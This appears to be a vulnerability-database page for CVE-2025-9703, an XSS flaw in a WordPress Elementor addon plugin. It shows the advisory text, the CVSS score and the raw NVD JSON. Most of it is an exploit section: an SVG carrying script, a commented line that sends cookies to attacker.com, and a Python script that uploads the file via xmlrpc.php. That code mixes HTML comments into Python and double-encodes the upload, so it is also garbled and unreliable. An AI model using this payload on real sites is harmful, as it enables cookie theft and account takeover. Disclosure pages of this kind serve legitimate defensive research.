Security Vulnerability Report
中文
CVE-2025-9703 CVSS 4.3 MEDIUM

CVE-2025-9703

Published: 2025-10-06 06:15:37
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Ultimate Addons for Elementor (Formerly Elementor Header & Footer Builder) WordPress plugin before 2.5.0 does not sanitize SVG file contents when uploaded through the xmlrpc.php endpoint using base64 encode, leading to a Cross-Site Scripting vulnerability.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Ultimate Addons for Elementor < 2.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-9703 PoC: XSS via Unsanitized SVG Upload through xmlrpc.php --> <!-- Step 1: Create malicious SVG file with embedded JavaScript --> <svg xmlns="http://www.w3.org/2000/svg" width="100" height="100"> <script type="text/javascript"> // Malicious JavaScript payload alert('XSS via SVG - CVE-2025-9703'); // In real attack: steal cookies, redirect users, etc. // document.location='http://attacker.com/steal?cookie='+document.cookie; </script> <!-- Alternative: use event handlers --> <circle cx="50" cy="50" r="40" fill="red" onload="alert('XSS via onload event')"/> </svg> <!-- Step 2: Base64 encode the SVG content --> <!-- Use: base64 malicious.svg > encoded.txt --> <!-- Step 3: Upload via xmlrpc.php using authenticated session --> <!-- Python PoC for uploading via xmlrpc.php --> import xmlrpc.client import base64 # Read malicious SVG content with open('malicious.svg', 'rb') as f: svg_content = f.read() # Base64 encode the content encoded_svg = base64.b64encode(svg_content).decode('utf-8') # Connect to WordPress xmlrpc.php url = 'http://target-wordpress-site.com/xmlrpc.php' proxy = xmlrpc.client.ServerProxy(url) # Upload using wp.uploadFile method (requires authentication) # Note: Attacker needs valid credentials with appropriate privileges result = proxy.wp.uploadFile( 1, # blog_id 'admin', # username 'password', # password { 'name': 'malicious.svg', 'type': 'image/svg+xml', 'bits': xmlrpc.client.Binary(encoded_svg), 'overwrite': True } ) print(f"Upload result: {result}") <!-- Step 4: Trigger XSS by visiting the page containing the uploaded SVG --> <!-- When a victim visits the page, the malicious script executes -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9703", "sourceIdentifier": "[email protected]", "published": "2025-10-06T06:15:37.177", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Ultimate Addons for Elementor (Formerly Elementor Header & Footer Builder) WordPress plugin before 2.5.0 does not sanitize SVG file contents when uploaded through the xmlrpc.php endpoint using base64 encode, leading to a Cross-Site Scripting vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 3.4}]}, "references": [{"url": "https://wpscan.com/vulnerability/4332d49b-d58c-4728-afab-6757ff9e43ee/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.